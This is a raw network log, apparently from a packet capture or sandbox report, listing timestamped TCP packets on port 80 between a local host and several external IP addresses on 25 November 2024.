                                                                                                                                                Nov 25, 2024 09:43:33.514730930 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:33.634495020 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:34.856048107 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:34.856173038 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:34.856244087 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:35.028795958 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.044747114 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.164241076 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:36.164338112 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.188087940 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:36.307761908 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:37.476222992 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:37.476294994 CET8049836212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:37.476402998 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:37.698596954 CET4983680192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:38.718921900 CET4984280192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:38.838567019 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.838670015 CET4984280192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:38.860346079 CET4984280192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:38.979974031 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980053902 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980106115 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980135918 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980206013 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980235100 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980324030 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980350971 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:38.980385065 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:40.150520086 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:40.197422981 CET4984280192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:40.242661953 CET8049842212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:40.242719889 CET4984280192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:40.369609118 CET4984280192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:41.392103910 CET4984880192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:41.971445084 CET8049848212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:41.971563101 CET4984880192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:41.982048035 CET4984880192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:42.101620913 CET8049848212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:43.245337963 CET8049848212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:43.245412111 CET8049848212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:43.245518923 CET4984880192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:43.248927116 CET4984880192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:43.368381023 CET8049848212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:48.603462934 CET4986480192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:48.722980022 CET8049864172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:48.723113060 CET4986480192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:48.742036104 CET4986480192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:48.861545086 CET8049864172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:50.074935913 CET8049864172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:50.074956894 CET8049864172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:50.075376987 CET8049864172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:50.075409889 CET4986480192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:50.078236103 CET4986480192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:50.244404078 CET4986480192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:51.266499043 CET4987280192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:51.386092901 CET8049872172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:51.386291027 CET4987280192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:51.404033899 CET4987280192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:51.523561001 CET8049872172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:52.763998032 CET8049872172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:52.764067888 CET8049872172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:52.764122009 CET4987280192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:52.764178991 CET8049872172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:52.764231920 CET4987280192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:52.916316986 CET4987280192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:53.938292027 CET4988180192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:54.057921886 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.060302973 CET4988180192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:54.086210012 CET4988180192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:54.206007004 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206018925 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206027031 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206034899 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206051111 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206058979 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206170082 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206178904 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:54.206234932 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:55.395097017 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:55.395175934 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:55.395539999 CET8049881172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:55.400152922 CET4988180192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:55.588273048 CET4988180192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:56.608239889 CET4988780192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:56.728051901 CET8049887172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:56.728137016 CET4988780192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:56.739197969 CET4988780192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:56.858819008 CET8049887172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:58.057775021 CET8049887172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:58.057900906 CET8049887172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:58.057910919 CET8049887172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:58.058248043 CET4988780192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:58.064143896 CET4988780192.168.2.4172.67.223.206
                                                                                                                                                Nov 25, 2024 09:43:58.183579922 CET8049887172.67.223.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:03.659944057 CET4990380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:03.779546976 CET8049903172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:03.782085896 CET4990380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:03.798336983 CET4990380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:03.917885065 CET8049903172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:05.306993961 CET4990380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:05.636532068 CET4990380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:05.809859991 CET8049903172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:05.809900045 CET8049903172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:05.810168982 CET4990380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:06.329361916 CET4990980192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:06.449141979 CET8049909172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:06.449248075 CET4990980192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:06.495822906 CET4990980192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:06.615406990 CET8049909172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:07.719129086 CET8049909172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:07.719553947 CET8049909172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:07.720300913 CET4990980192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:08.010176897 CET4990980192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:09.033337116 CET4991580192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:09.152915955 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.153060913 CET4991580192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:09.168637991 CET4991580192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:09.288249969 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288343906 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288353920 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288506031 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288521051 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288567066 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288594007 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288786888 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:09.288796902 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:10.340202093 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:10.340396881 CET8049915172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:10.340449095 CET4991580192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:10.682249069 CET4991580192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:11.703972101 CET4992380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:11.823710918 CET8049923172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:11.823822021 CET4992380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:11.833236933 CET4992380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:11.952725887 CET8049923172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:13.150933027 CET8049923172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:13.151592016 CET8049923172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:13.151658058 CET4992380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:13.167948961 CET4992380192.168.2.4172.67.186.192
                                                                                                                                                Nov 25, 2024 09:44:13.287695885 CET8049923172.67.186.192192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:18.937064886 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:19.056607962 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:19.056684017 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:19.076984882 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:19.196703911 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:20.346652031 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:20.346684933 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:20.346694946 CET8049941161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:20.346736908 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:20.588466883 CET4994180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:21.655926943 CET4994880192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:21.775448084 CET8049948161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:21.775717974 CET4994880192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:21.822097063 CET4994880192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:21.941713095 CET8049948161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:23.073374987 CET8049948161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:23.073443890 CET8049948161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:23.073460102 CET8049948161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:23.073497057 CET4994880192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:23.073539019 CET4994880192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:23.340230942 CET4994880192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:24.438683987 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:24.558996916 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.559075117 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:24.731765032 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:24.851406097 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.851425886 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.851574898 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.851623058 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.851835966 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.851878881 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.852041960 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.852054119 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:24.852231979 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:25.813674927 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:25.813745975 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:25.813756943 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:25.814341068 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:26.260410070 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:27.302259922 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:27.421760082 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:27.426335096 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:27.455677986 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:27.575238943 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762455940 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762536049 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762573004 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762603998 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762634993 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:28.762644053 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.762675047 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.762695074 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.768480062 CET4996180192.168.2.4161.97.142.144
                                                                                                                                                Nov 25, 2024 09:44:28.888600111 CET8049961161.97.142.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:34.103215933 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:34.222784042 CET804997843.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:34.222898006 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:34.239140987 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:34.358752012 CET804997843.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:35.744959116 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:35.864783049 CET804997843.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:35.870448112 CET4997880192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:36.764581919 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:36.884249926 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:36.884337902 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:36.903022051 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:37.022639990 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.416552067 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:38.460024118 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.460078955 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:38.460158110 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.460215092 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:38.536060095 CET804998643.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:38.536108971 CET4998680192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.435357094 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.555087090 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.555332899 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.572726965 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:39.692635059 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692646027 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692718983 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692738056 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692835093 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692882061 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692938089 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.692998886 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:39.693111897 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:41.088356972 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:41.115652084 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:41.115726948 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:41.208204985 CET804999343.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:41.208257914 CET4999380192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.131573915 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.251137972 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:42.251358986 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.262790918 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:42.382293940 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:43.814791918 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:43.814838886 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:43.815064907 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:43.820281982 CET4999980192.168.2.443.199.54.158
                                                                                                                                                Nov 25, 2024 09:44:43.941437006 CET804999943.199.54.158192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:49.235855103 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:49.355447054 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:49.355643034 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:49.380299091 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:49.499856949 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:50.674333096 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:50.674415112 CET8050015209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:50.674460888 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:50.885225058 CET5001580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:51.904280901 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:52.023771048 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:52.023936033 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:52.039508104 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:52.159001112 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:53.337768078 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:53.337846041 CET8050022209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:53.340985060 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:53.545459032 CET5002280192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.561028004 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.680592060 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.680655003 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.698921919 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:54.818486929 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818521023 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818608046 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818629026 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818742037 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818753004 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818823099 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818845034 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:54.818948030 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:56.021486998 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:56.021640062 CET8050030209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:56.024434090 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:56.214524984 CET5003080192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.233242989 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.352737904 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:57.352843046 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.363040924 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:57.482481956 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:58.679361105 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:58.679430962 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:44:58.679491043 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:58.682893991 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:58.802417994 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:04.444755077 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:04.564189911 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:04.564277887 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:04.581717968 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:04.701195955 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:05.813123941 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:05.813189983 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:05.816414118 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:06.088476896 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.108553886 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.228725910 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:07.228815079 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.243805885 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.363357067 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:08.524236917 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:08.524315119 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:08.524374008 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:08.760586023 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:09.779345989 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:09.898895025 CET8050046185.27.134.206192.168.2.4
